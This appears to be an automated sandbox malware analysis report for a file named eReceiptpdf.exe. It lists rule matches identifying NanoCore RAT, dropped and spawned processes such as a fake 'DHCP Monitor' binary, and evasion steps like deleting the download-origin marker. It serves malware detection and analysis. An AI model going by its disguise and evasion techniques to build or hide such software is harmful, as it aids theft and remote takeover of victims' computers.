      Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_0166A038
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_016613C6
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_016694E4
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_01663650
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_01660659
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_01660F18
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_01668EF6
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_01660F09
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE13C6
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DEA038
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE36D8
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE0659
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE94D7
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE8EF3
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE3E50
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE0F18
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DEC00A
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DEB9FA
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DE0F09
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 18_2_0306E471
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 18_2_0306E480
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 18_2_0306BBD4
      Source: eReceiptpdf.exe, 00000000.00000000.307229515.0000000002F60000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameAlienRunPE.exe6 vs eReceiptpdf.exe
      Source: eReceiptpdf.exe, 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWPhv JLl.exe2 vs eReceiptpdf.exe
      Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
      Source: eReceiptpdf.exe, 00000000.00000000.295168078.0000000000DEE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe
      Source: eReceiptpdf.exe, 00000005.00000000.290366463.000000000083E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe
      Source: eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
      Source: eReceiptpdf.exeBinary or memory string: OriginalFilenameUltimate.dll2 vs eReceiptpdf.exe
      Source: eReceiptpdf.exeBinary or memory string: OriginalFilenamePayroll Management System.exeT vs eReceiptpdf.exe
      Source: eReceiptpdf.exeStatic PE information: invalid certificate
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile read: C:\Users\user\Desktop\eReceiptpdf.exeJump to behavior
      Source: eReceiptpdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\eReceiptpdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\eReceiptpdf.exe 'C:\Users\user\Desktop\eReceiptpdf.exe'
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Users\user\Desktop\eReceiptpdf.exe C:\Users\user\Desktop\eReceiptpdf.exe
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 2176
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
      Source: C:\Users\user\Desktop\eReceiptpdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6061.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@14/13@19/4
      Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmp, eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.333769964.0000000000B32000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.330482629.0000000000422000.00000002.00020000.sdmp, dhcpmon.exe, 00000011.00000000.331107108.0000000000342000.00000002.00020000.sdmp, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
      Source: eReceiptpdf.exe, 00000000.00000000.295140150.0000000000DC2000.00000002.00020000.sdmp, eReceiptpdf.exe, 00000005.00000000.290341595.0000000000812000.00000002.00020000.sdmp, dhcpmon.exe, 0000000C.00000002.333769964.0000000000B32000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.330482629.0000000000422000.00000002.00020000.sdmp, dhcpmon.exe, 00000011.00000000.331107108.0000000000342000.00000002.00020000.sdmp, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
      Source: C:\Users\user\Desktop\eReceiptpdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\eReceiptpdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: eReceiptpdf.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7124
      Source: C:\Users\user\Desktop\eReceiptpdf.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d49cd953-2518-4f4a-81ab-2e5bbd26887f}
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
      Source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: eReceiptpdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: eReceiptpdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbI/ source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Core.ni.pdbRSDSD source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.Xml.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.pdbMZ@ source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: 1}\Servererver32dows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb(1 source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Configuration.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdble}i source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: .pdb& source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.326221264.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: System.Xml.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.306359653.0000000001541000.00000004.00000020.sdmp
      Source: Binary string: System.Core.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\user\Desktop\eReceiptpdf.exeisualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Servererver32)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUT source: eReceiptpdf.exe, 00000000.00000000.304724116.0000000007830000.00000004.00000001.sdmp
      Source: Binary string: mscorlib.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: mscorlib.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp
      Source: Binary string: System.Core.pdb source: WER6061.tmp.dmp.11.dr
      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER6061.tmp.dmp.11.dr
      Source: Binary string: C:\Users\user\Desktop\eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.Xml.ni.pdbRSDS source: WER6061.tmp.dmp.11.dr
      Source: Binary string: jVisualBasic.pdb< source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: eReceiptpdf.PDB source: eReceiptpdf.exe, 00000000.00000000.311535014.00000000066AA000.00000004.00000010.sdmp
      Source: Binary string: System.ni.pdb source: WER6061.tmp.dmp.11.dr
      Source: C:\Users\user\Desktop\eReceiptpdf.exeCode function: 0_2_00DCDF6C push ss; retn 0000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_00B3DF6C push ss; retn 0000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DEAE48 push eax; mov dword ptr [esp], ecx
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_02DEAF1B push eax; mov dword ptr [esp], ecx
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0042DF6C push ss; retn 0000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 17_2_0034DF6C push ss; retn 0000h
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 18_2_00D4DF6C push ss; retn 0000h
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\eReceiptpdf.exeFile opened: C:\Users\user\Desktop\eReceiptpdf.exe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\eReceiptpdf.exeProcess information set: NOOPENFILEERRORBOX
